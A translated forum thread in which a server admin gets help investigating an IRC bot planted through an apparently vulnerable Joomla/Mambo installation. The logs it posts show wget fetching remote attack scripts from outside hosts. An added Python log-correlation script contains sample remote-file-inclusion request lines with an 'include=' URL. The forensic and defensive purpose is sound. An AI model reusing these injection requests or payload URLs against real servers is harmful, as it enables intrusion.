DoS attack

docHouse

New Member
Hello everyone,
I could use your help; I'm currently wrestling with a DoS attack [at least that's what I assume]. I haven't really found anything in the log files, though, at least not so far.

Fact is, usually at some point during the night a Perl process gets started, which of course eats up all the server resources.

And then I had the strange problem that Apache wouldn't start any more - error message: Port already in use

Today I found the attached file, but I'm pretty stumped, since I don't really know what to make of it.

Whether and how that's connected, no idea ...

THX
Regards
DocHouse
 


Hello,

that's an IRC bot; the texts in the script are Portuguese, AltaVista Babel Fish Translation can translate them into English after a fashion.

So your server has been "hacked". You should shut it down or (if your provider offers it) boot into the rescue system so it can't do any further damage.

It's hard to say whether the intruder only smuggled in this one script or did more on the server; in the worst case he now has root access.

Standard recommendation: back up everything from the rescue system and reinstall. Before that (or afterwards, once you have the full backup on your PC), check the log files to see how he got in.

In which directory was the file found?
What permissions, owner and group does the file have?
What permissions, owner and group does the directory it is in have?
Which operating system? For Linux: which kernel?
When were all the standard services last updated?
Settings for register_globals and allow_url_fopen in php.ini (if there are several, look at all of them)?
Which standard PHP packages (boards, *nuke, *gallery etc.) are installed?
 
Hi ...

I'll do it quickly ;-)

In which directory was the file found?
/tmp
What permissions, owner and group does the file have?
-rw-r--r-- | wwwrun | www
What permissions, owner and group does the directory it is in have?
drwxrwxrwt | root | root
Which operating system? For Linux: which kernel?
Suse 9.3 | Apache 2.0.53 API 20020903 | PHP 4.3.10
When were all the standard services last updated?
< 2 weeks
Settings for register_globals and allow_url_fopen in php.ini (if there are several, look at all of them)?
off | on
Which standard PHP packages (boards, *nuke, *gallery etc.) are installed?
Various Joomla / Mambo installations

Oh yes, and today I blocked port 6667 in Plesk.

And then I just found another file, ips.txt, with the following content:

Code:
addr:85.xxx.35.238
addr:
addr:127.0.0.1
addr:

Whether he only smuggled in this or more, yes, hard to say, but I looked at the file changes of the last 24 hours and didn't really notice anything conspicuous ...

thx
 
Hello,

In which directory was the file found?
/tmp
What permissions, owner and group does the file have?
-rw-r--r-- | wwwrun | www
Almost certainly injected via an insecure PHP script.

When was the kernel last updated? Which one is running (uname -a)?

When were all the standard services last updated?
< 2 weeks
OK.
allow_url_fopen: on
That makes you vulnerable to one of the most common holes in the PHP packages.
Various Joomla / Mambo installations
Probably got in through those. When were they last updated?
And then I just found another file, ips.txt
Belongs to the script (configuration file).

It may be that nothing happened apart from the bot, but it may also be that the hacker gained root access and installed a rootkit. Run chkrootkit (chkrootkit -- locally checks for signs of a rootkit). Unfortunately chkrootkit isn't reliable.
 
So, now I've found quite a bit after all ....

[Sun Sep 10 03:26:17 2006] [error] [client 212.241.202.240] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Sep 10 03:45:56 2006] [error] [client 212.241.202.240] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Sep 10 12:02:28 2006] [error] [client 85.214.54.110] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)

--16:16:07-- http://www.myspace.si/inc/htaccess
=> `htaccess'
Resolving MySpace .si | myspace layouts, myspace editor, myspace backgrounds, myspace codes... 195.246.8.48
Connecting to www.myspace.si|195.246.8.48|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30,070 (29K) [text/plain]

0K ..--16:16:07-- http://www.myspace.si/inc/htaccess
=> `htaccess.1'
Resolving MySpace .si | myspace layouts, myspace editor, myspace backgrounds, myspace codes... 195.246.8.48
Connecting to www.myspace.si|195.246.8.48|:80... ........ .connected.
HTTP request sent, awaiting response... ......... ......200 OK
Length: 30,070 (29K) [text/plain]

0K ..... 100% 240.45 KB/s

16:16:07 (240.45 KB/s) - `htaccess' saved [30070/30070]

........ .......... ......... 100% 229.44 KB/s

utime(htaccess.1): No such file or directory
16:16:07 (229.44 KB/s) - `htaccess.1' saved [30070/30070]

chmod: cannot access `htaccess': No such file or directory
sh: ./htaccess: No such file or directory
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 30070 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 30070 100 30070 0 0 163k 0 --:--:-- --:--:-- --:--:-- 333k
[Sun Sep 10 16:39:14 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/README
[Sun Sep 10 16:39:15 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/horde
[Sun Sep 10 16:39:15 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/horde2
[Sun Sep 10 16:39:15 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/horde3
[Sun Sep 10 16:39:16 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/horde-3.0.5
[Sun Sep 10 16:39:16 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/horde-3.0.6
[Sun Sep 10 16:39:16 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/horde-3.0.7
[Sun Sep 10 16:39:17 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/horde-3.0.8
[Sun Sep 10 16:39:17 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/horde-3.0.9
[Sun Sep 10 16:39:18 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/mail
[Sun Sep 10 16:39:18 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/email
[Sun Sep 10 16:39:18 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/webmail
[Sun Sep 10 16:39:19 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/newmail
[Sun Sep 10 16:39:19 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/mails
[Sun Sep 10 16:39:19 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/mailz
[Sun Sep 10 17:29:39 2006] [error] [client 216.145.17.190] File does not exist: /var/www/vhosts/default/htdocs/robots.txt, referer: Whois lookup and Domain name search
[Sun Sep 10 17:52:07 2006] [error] [client 60.191.251.9] File does not exist: /var/www/vhosts/default/htdocs/mambo
--19:10:08-- http://www.myspace.si/inc/htaccess
=> `htaccess'
Resolving MySpace .si | myspace layouts, myspace editor, myspace backgrounds, myspace codes... 195.246.8.48
Connecting to www.myspace.si|195.246.8.48|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30,070 (29K) [text/plain]

0K .......... .......... ......... 100% 205.77 KB/s

19:10:08 (205.77 KB/s) - `htaccess' saved [30070/30070]

[Sun Sep 10 19:41:28 2006] [error] [client 208.17.184.48] File does not exist: /var/www/vhosts/default/htdocs/robots.txt, referer: -
[Sun Sep 10 19:50:32 2006] [error] [client 72.30.133.120] File does not exist: /var/www/vhosts/default/htdocs/robots.txt
[Sun Sep 10 19:50:42 2006] [error] [client 72.30.103.95] script '/var/www/vhosts/default/htdocs/index.php' not found or unable to stat
[Sun Sep 10 20:54:05 2006] [error] [client 193.227.17.30] File does not exist: /var/www/vhosts/default/htdocs/mambo
--20:55:47-- http://teseu.lcc.ufmg.br/joomla/components/com_extcalendar/httpd.txt
=> `httpd.txt'
Resolving teseu.lcc.ufmg.br... 150.164.66.72
Connecting to teseu.lcc.ufmg.br|150.164.66.72|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,759 (29K) [text/plain]

0K .......... .......... ......... 100% 31.05 KB/s

20:55:48 (31.05 KB/s) - `httpd.txt' saved [29759/29759]

[Sun Sep 10 21:03:12 2006] [error] [client 200.90.110.74] File does not exist: /var/www/vhosts/default/htdocs/mambo
--21:15:21-- http://www.myspace.si/inc/htaccess
=> `htaccess'
Resolving MySpace .si | myspace layouts, myspace editor, myspace backgrounds, myspace codes... 195.246.8.48
Connecting to www.myspace.si|195.246.8.48|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30,070 (29K) [text/plain]

0K .......... .......... ......... 100% 242.08 KB/s

21:15:21 (242.08 KB/s) - `htaccess' saved [30070/30070]

[Sun Sep 10 22:16:37 2006] [error] [client 222.45.36.8] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Sun Sep 10 22:28:03 2006] [error] [client 122.254.242.91] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 00:13:57 2006] [error] [client 202.93.8.147] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 00:24:14 2006] [error] [client 61.100.51.245] File does not exist: /var/www/vhosts/default/htdocs/mambo
--00:24:24-- http://69.24.164.241/mar5.txt
=> `mar5.txt'
Connecting to 69.24.164.241:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,670 (29K) [text/plain]

0K .......... .......... ........ 100% 33.83 KB/s

00:24:25 (33.83 KB/s) - `mar5.txt' saved [29670/29670]

[Mon Sep 11 00:25:56 2006] [error] [client 202.93.8.147] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 01:01:45 2006] [error] [client 87.118.96.245] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Mon Sep 11 01:08:26 2006] [error] [client 68.142.212.201] File does not exist: /var/www/vhosts/default/htdocs/robots.txt
[Mon Sep 11 02:19:13 2006] [error] [client 213.247.32.6] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 02:24:08 2006] [error] [client 210.87.251.106] File does not exist: /var/www/vhosts/default/htdocs/mambo
--03:26:25-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 308.44 KB/s

03:26:25 (308.44 KB/s) - `v6.txt' saved [16629/16629]

[Mon Sep 11 03:43:36 2006] [error] [client 82.117.211.7] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 03:49:15 2006] [error] [client 193.227.17.30] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 04:18:15 2006] [error] [client 213.247.32.6] File does not exist: /var/www/vhosts/default/htdocs/mambo
--04:24:45-- http://www.myspace.si/inc/htaccess
=> `htaccess'
Resolving MySpace .si | myspace layouts, myspace editor, myspace backgrounds, myspace codes... 195.246.8.48
Connecting to www.myspace.si|195.246.8.48|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30,070 (29K) [text/plain]

0K .......... .......... ......... 100% 358.90 KB/s

04:24:45 (358.90 KB/s) - `htaccess' saved [30070/30070]

[Mon Sep 11 04:32:29 2006] [error] [client 70.86.137.162] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 04:36:50 2006] [error] [client 68.142.212.234] File does not exist: /var/www/vhosts/default/htdocs/robots.txt
[Mon Sep 11 05:13:16 2006] [error] [client 139.18.13.212] File does not exist: /var/www/vhosts/httpdocs/robots.txt
[Mon Sep 11 06:29:24 2006] [error] [client 222.148.43.178] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 06:37:29 2006] [error] [client 72.30.252.152] File does not exist: /var/www/vhosts/default/htdocs/robots.txt
[Mon Sep 11 07:10:15 2006] [error] [client 193.227.17.30] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 07:59:39 2006] [error] [client 212.34.175.87] File does not exist: /var/www/vhosts/default/htdocs/robots.txt
[Mon Sep 11 08:14:46 2006] [error] [client 213.203.237.130] File does not exist: /var/www/vhosts/default/htdocs/robots.txt
[Mon Sep 11 08:14:46 2006] [error] [client 213.203.237.130] File does not exist: /var/www/vhosts/default/htdocs/Templates
[Mon Sep 11 08:14:46 2006] [error] [client 213.203.237.130] File does not exist: /var/www/vhosts/default/htdocs/Templates
[Mon Sep 11 08:14:46 2006] [error] [client 213.203.237.130] File does not exist: /var/www/vhosts/default/htdocs/Templates
[Mon Sep 11 08:14:46 2006] [error] [client 213.203.237.130] File does not exist: /var/www/vhosts/default/htdocs/Templates
[Mon Sep 11 08:14:46 2006] [error] [client 213.203.237.130] File does not exist: /var/www/vhosts/default/htdocs/Templates
[Mon Sep 11 08:14:46 2006] [error] [client 213.203.237.130] File does not exist: /var/www/vhosts/default/htdocs/impressum.html
[Mon Sep 11 08:26:41 2006] [error] [client 203.187.249.27] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 08:28:59 2006] [error] [client 221.148.195.190] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 08:38:35 2006] [error] [client 87.123.90.1] File does not exist: /var/www/vhosts/default/htdocs/favicon.ico
[Mon Sep 11 08:39:47 2006] [notice] Graceful restart requested, doing restart
[Mon Sep 11 08:39:48 2006] [warn] RSA server certificate CommonName (CN) `h746895.serverkompetenz.net' does NOT match server name!?
[Mon Sep 11 08:39:48 2006] [warn] RSA server certificate CommonName (CN) `plesk' does NOT match server name!?
[Mon Sep 11 08:39:49 2006] [notice] Apache/2.0.53 (Linux/SUSE) configured -- resuming normal operations
[Mon Sep 11 09:15:59 2006] [error] [client 68.142.212.233] File does not exist: /var/www/vhosts/default/htdocs/robots.txt
[Mon Sep 11 09:27:45 2006] [error] [client 70.86.137.162] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 09:33:48 2006] [error] [client 70.86.137.162] File does not exist: /var/www/vhosts/default/htdocs/mambonew
[Mon Sep 11 10:22:22 2006] [error] [client 61.110.223.240] File does not exist: /var/www/vhosts/default/htdocs/mambo
--10:29:15-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... --10:29:15-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K ..200 OK
Length: 16,629 (16K) [text/plain]
v6.txt has sprung into existence.
Retrying.

........ ...... 100% 210.25 KB/s

10:29:15 (210.25 KB/s) - `v6.txt' saved [16629/16629]

--10:29:16-- http://perqafohu.com/~armendibx/oki/v6.txt
(try: 2) => `v6.txt.1'
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 234.60 KB/s

10:29:16 (234.60 KB/s) - `v6.txt.1' saved [16629/16629]

Can't open perl script "v6.txt": No such file or directory
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
15 16629 15 2668 0 0 35996 0 --:--:-- --:--:-- --:--:-- 35996
100 16629 100 16629 0 0 113k 0 --:--:-- --:--:-- --:--:-- 200k
And it goes on like that .....
 
Hello,

the server it's trying to fetch v6.txt from is unreachable; presumably that's why the attack script kept getting restarted.
 
Hello,

the problem now is just: what's the smartest way to find out how he got in?

Before that there's no real point in "redoing" the server ... makes no sense ;-)

Since it's hooked up to IRC, does blocking the port help at all?

And in between it kept saving e.g. htaccess1 etc. ... so it must already have put something on the machine?!

When was the kernel last updated? Which one is running (uname -a)?
2.6.11.4-21.13-default #1 Mon Jul 17 09_21:59 UTC 2006 i686 athlon i386 GNU/Linux

regards
 
Hello,

the problem now is just: what's the smartest way to find out how he got in?
Read the log files. :) You only quoted the error log; the access log at the same times is interesting too. The calls to Mambo (or whatever the entry point is) are successful, so they only show up in the access log.
It may already be enough to search the access log for v6.txt.

Since it's hooked up to IRC, does blocking the port help at all?
You can investigate from the rescue system too.
Otherwise I'd at least block 6667 and stop Apache.

The kernel appears to be SUSE's default, version from 17 July; that one is fine, the serious hole from 15 July is closed and no serious security vulnerability has been reported since. That reduces the risk that the intruder gained root privileges. Run chkrootkit anyway.
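An added example (not from the thread) of the correlation suggested above: it pulls the wget fetch lines out of error-log text of the kind quoted earlier, dates them from the surrounding dated error entries, and looks for access-log requests near each fetch, flagging the ones that name the downloaded file or its host. The log lines, the client IPs and the `include=` parameter in the request lines are constructed samples, not data from the thread.

```python
"""Correlate bot download traces in an Apache error log with the access log.

The error log quoted in the thread shows wget progress output ("--HH:MM:SS-- URL",
"`file' saved [n/n]") interleaved with normal "[date] [error] [client ip]" entries.
The wget lines carry no date, so each fetch takes its date from the most recent
dated error entry above it. Each fetch is then looked up in the access log: a
request logged within a short window of the fetch, and especially one whose
request line names the fetched file or host, is the likely entry point.
"""
import re
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from urllib.parse import urlsplit

ERROR_TS_RE = re.compile(r"^\[(\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4})\]")
WGET_START_RE = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)")
# Combined log format: ip ident user [ts] "request" status ...
ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')

# Constructed sample: error-log excerpt in the format seen in the thread.
SAMPLE_ERROR_LOG = """\
[Sun Sep 10 20:54:05 2006] [error] [client 193.227.17.30] File does not exist: /var/www/vhosts/default/htdocs/mambo
--20:55:47--  http://teseu.lcc.ufmg.br/joomla/components/com_extcalendar/httpd.txt
           => `httpd.txt'
20:55:48 (31.05 KB/s) - `httpd.txt' saved [29759/29759]
[Mon Sep 11 02:24:08 2006] [error] [client 210.87.251.106] File does not exist: /var/www/vhosts/default/htdocs/mambo
--03:26:25--  http://perqafohu.com/~armendibx/oki/v6.txt
           => `v6.txt'
03:26:25 (308.44 KB/s) - `v6.txt' saved [16629/16629]
Can't open perl script "v6.txt": No such file or directory
"""

# Constructed sample access log: documentation IPs, and a hypothetical
# "include=" parameter standing in for whatever the vulnerable script accepts.
SAMPLE_ACCESS_LOG = """\
193.227.17.30 - - [10/Sep/2006:20:54:05 +0200] "GET /mambo/ HTTP/1.1" 404 293 "-" "-"
203.0.113.5 - - [10/Sep/2006:20:55:46 +0200] "GET /site/index.php?include=http://teseu.lcc.ufmg.br/joomla/components/com_extcalendar/httpd.txt? HTTP/1.1" 200 1523 "-" "libwww-perl/5.805"
198.51.100.7 - - [10/Sep/2006:20:56:30 +0200] "GET /index.php HTTP/1.1" 200 4311 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Sep/2006:03:26:24 +0200] "GET /site/index.php?include=http://perqafohu.com/~armendibx/oki/v6.txt? HTTP/1.1" 200 1523 "-" "libwww-perl/5.805"
"""


@dataclass
class Fetch:
    when: datetime                 # date from the last dated error entry, time from wget
    url: str
    candidates: list = field(default_factory=list)   # (ip, when, request, strong)


def parse_error_log(text):
    """Return the wget fetches found in error-log text, with full timestamps."""
    current_date = None
    fetches = []
    for line in text.splitlines():
        m = ERROR_TS_RE.match(line)
        if m:
            current_date = datetime.strptime(m.group(1), "%a %b %d %H:%M:%S %Y").date()
            continue
        m = WGET_START_RE.match(line)
        if m and current_date is not None:
            t = datetime.strptime(m.group(1), "%H:%M:%S").time()
            fetches.append(Fetch(datetime.combine(current_date, t), m.group(2)))
    return fetches


def parse_access_log(text):
    """Return (ip, when, request, status) tuples; both logs are assumed to be in
    server local time, so the access-log UTC offset is dropped."""
    entries = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        when = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
        entries.append((m.group("ip"), when, m.group("req"), int(m.group("status"))))
    return entries


def correlate(fetches, access, window=timedelta(seconds=120)):
    """Attach access-log requests logged within `window` of each fetch; a request
    that contains the fetched file name or host is marked strong."""
    for f in fetches:
        parts = urlsplit(f.url)
        needles = (parts.path.rsplit("/", 1)[-1], parts.hostname or "")
        for ip, when, req, status in access:
            if abs(when - f.when) > window:
                continue
            strong = any(n and n in req for n in needles)
            f.candidates.append((ip, when, req, strong))
    return fetches


def likely_entry_points(fetches):
    """(fetched url, client ip, request line) for every strong match: chase these first."""
    return [(f.url, ip, req) for f in fetches for ip, _, req, strong in f.candidates if strong]


if __name__ == "__main__":
    result = correlate(parse_error_log(SAMPLE_ERROR_LOG), parse_access_log(SAMPLE_ACCESS_LOG))
    for url, ip, req in likely_entry_points(result):
        print(f"{ip} -> {req}  (fetched {url})")
```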
 
Hello ...

So I ran chkrootkit, though the built-in one from Plesk ... they probably don't differ much ...

And the logs, I'll get back to those in a moment; in the meantime I did another netstat - does this look okay, or do I need to worry about the South American and Caribbean IPs?

It should also be relatively easy to block the IPs via iptables, or all of them from the corresponding region?


Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:2912 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:106 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8880 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:465 0.0.0.0:* LISTEN
tcp 0 0 85.214.35.238:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8443 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:2911 0.0.0.0:* LISTEN
tcp 0 0 85.214.35.238:143 83.77.200.109:59752 ESTABLISHED
tcp 0 0 85.214.35.238:110 217.188.112.19:1356 TIME_WAIT
tcp 0 0 85.214.35.238:56632 85.214.35.238:80 TIME_WAIT
tcp 0 0 85.214.35.238:33899 85.214.35.238:110 TIME_WAIT
tcp 0 0 85.214.35.238:33900 85.214.35.238:110 TIME_WAIT
tcp 0 0 85.214.35.238:33901 85.214.35.238:110 TIME_WAIT
tcp 0 0 85.214.35.238:143 87.122.224.156:1026 ESTABLISHED
tcp 0 0 85.214.35.238:993 87.122.224.156:4753 ESTABLISHED
tcp 0 0 85.214.35.238:143 87.122.224.156:4748 ESTABLISHED
tcp 0 0 85.214.35.238:143 87.122.224.156:5000 ESTABLISHED
tcp 0 0 85.214.35.238:143 87.122.224.156:4747 ESTABLISHED
tcp 0 0 85.214.35.238:143 87.122.224.156:4740 ESTABLISHED
tcp 0 0 85.214.35.238:143 87.122.224.156:4999 ESTABLISHED
tcp 0 0 85.214.35.238:143 87.122.224.156:4998 ESTABLISHED
tcp 0 0 :::80 :::* LISTEN
tcp 0 0 :::22 :::* LISTEN
tcp 0 0 :::443 :::* LISTEN
tcp 0 0 85.214.35.238:22 87.122.243.157:1554 ESTABLISHED
tcp 0 0 85.214.35.238:80 206.82.130.210:51766 TIME_WAIT
tcp 0 2776 85.214.35.238:22 87.122.224.156:4655 ESTABLISHED
tcp 0 0 85.214.35.238:80 129.35.231.1:60596 TIME_WAIT
tcp 0 0 85.214.35.238:80 83.135.129.37:1118 FIN_WAIT2
tcp 0 0 85.214.35.238:80 83.135.129.37:1116 FIN_WAIT2
tcp 0 0 85.214.35.238:80 83.135.129.37:1115 FIN_WAIT2
tcp 0 0 85.214.35.238:80 83.135.129.37:1114 FIN_WAIT2
tcp 0 0 85.214.35.238:80 83.135.129.37:1112 FIN_WAIT2
tcp 0 0 85.214.35.238:80 129.35.231.1:60635 TIME_WAIT
udp 0 0 0.0.0.0:32768 0.0.0.0:*
udp 0 0 85.214.35.238:53 0.0.0.0:*
udp 0 0 127.0.0.1:53 0.0.0.0:*
udp 112972 0 0.0.0.0:68 0.0.0.0:*
udp 0 0 85.214.35.238:123 0.0.0.0:*
udp 0 0 127.0.0.1:123 0.0.0.0:*
udp 0 0 0.0.0.0:123 0.0.0.0:*
udp 0 0 :::32769 :::*
udp 0 0 :::123 :::*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] STREAM LISTENING 16200 /var/lib/mysql/mysql.sock
unix 2 [ ACC ] STREAM LISTENING 16407 /tmp/spamd_light.sock
unix 2 [ ACC ] STREAM LISTENING 15831 /var/run/nscd/socket
unix 2 [ ] DGRAM 114808 /var/lib/named/dev/log
unix 2 [ ] DGRAM 114810 /var/lib/ntp/dev/log
unix 11 [ ] DGRAM 114806 /dev/log
unix 2 [ ] DGRAM 5513 @udevd
unix 2 [ ACC ] STREAM LISTENING 16398 /tmp/spamd_full.sock
unix 2 [ ] DGRAM 120679
unix 2 [ ] DGRAM 120675
unix 2 [ ] DGRAM 118193
unix 2 [ ] DGRAM 115407
unix 2 [ ] DGRAM 115380
unix 3 [ ] STREAM CONNECTED 115373
unix 3 [ ] STREAM CONNECTED 115372
unix 2 [ ] DGRAM 115311
unix 2 [ ] DGRAM 114934
unix 2 [ ] DGRAM 114882
unix 2 [ ] DGRAM 114868
unix 3 [ ] STREAM CONNECTED 110908
unix 3 [ ] STREAM CONNECTED 110907
unix 3 [ ] STREAM CONNECTED 20596 /var/lib/mysql/mysql.sock
unix 3 [ ] STREAM CONNECTED 20595
unix 2 [ ] DGRAM 20587
unix 2 [ ] DGRAM 16933
unix 3 [ ] STREAM CONNECTED 16664
unix 3 [ ] STREAM CONNECTED 16663
unix 3 [ ] STREAM CONNECTED 16432
unix 3 [ ] STREAM CONNECTED 16431
unix 3 [ ] STREAM CONNECTED 16430
unix 3 [ ] STREAM CONNECTED 16429
unix 3 [ ] STREAM CONNECTED 16419
unix 3 [ ] STREAM CONNECTED 16418
unix 3 [ ] STREAM CONNECTED 16417
unix 3 [ ] STREAM CONNECTED 16416
unix 2 [ ] DGRAM 16404
unix 2 [ ] DGRAM 16395
unix 2 [ ] DGRAM 15979
unix 2 [ ] DGRAM 15945
unix 2 [ ] DGRAM 15783
unix 2 [ ] DGRAM 15699
h746895:/ #

And here is another log excerpt for the period when it started!

217.20.116.60 - - [10/Sep/2006:15:24:15 +0200] "GET / HTTP/1.0" 200 1251 "-" "check_http/1.24.2.4 (nagios-plugins )"
85.214.35.238 - - [10/Sep/2006:15:24:35 +0200] "GET / HTTP/1.1" 200 1251 "-" "monit/4.6"
88.73.22.127 - - [10/Sep/2006:15:42:14 +0200] "GET / HTTP/1.1" 200 1251 "http://www.mal-sehn.com/index.php/links" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
88.73.22.127 - - [10/Sep/2006:15:42:15 +0200] "GET /default.css HTTP/1.1" 200 534 "http://www.kevin-kraus.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows N
88.73.22.127 - - [10/Sep/2006:15:42:15 +0200] "GET /def_plesk_logo.gif HTTP/1.1" 200 927 "http://www.kevin-kraus.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Wi
88.73.22.127 - - [10/Sep/2006:15:42:15 +0200] "GET /top_bg.jpg HTTP/1.1" 200 545 "http://www.kevin-kraus.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
88.73.22.127 - - [10/Sep/2006:15:42:15 +0200] "GET /top_body_bg.jpg HTTP/1.1" 200 14909 "http://www.kevin-kraus.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Win
88.73.22.127 - - [10/Sep/2006:15:42:42 +0200] "GET / HTTP/1.1" 304 - "http://www.mal-sehn.com/index.php/links" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
88.73.22.127 - - [10/Sep/2006:15:42:42 +0200] "GET /default.css HTTP/1.1" 304 - "http://www.kevin-kraus.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
88.73.22.127 - - [10/Sep/2006:15:42:42 +0200] "GET /def_plesk_logo.gif HTTP/1.1" 304 - "http://www.kevin-kraus.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Wind
88.73.22.127 - - [10/Sep/2006:15:42:42 +0200] "GET /top_body_bg.jpg HTTP/1.1" 304 - "http://www.kevin-kraus.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
88.73.22.127 - - [10/Sep/2006:15:42:42 +0200] "GET /top_bg.jpg HTTP/1.1" 304 - "http://www.kevin-kraus.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5
85.214.35.238 - - [10/Sep/2006:15:49:35 +0200] "GET / HTTP/1.1" 200 1251 "-" "monit/4.6"
80.86.82.101 - - [10/Sep/2006:15:54:14 +0200] "GET / HTTP/1.0" 200 1251 "-" "check_http/1.24.2.4 (nagios-plugins )"
85.214.35.238 - - [10/Sep/2006:16:14:36 +0200] "GET / HTTP/1.1" 200 1251 "-" "monit/4.6"
80.237.140.108 - - [10/Sep/2006:16:24:14 +0200] "GET / HTTP/1.0" 200 1251 "-" "check_http/1.24.2.4 (nagios-plugins )"
216.73.112.234 - - [10/Sep/2006:16:39:14 +0200] "GET //README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:15 +0200] "GET /horde//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:15 +0200] "GET /horde2//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
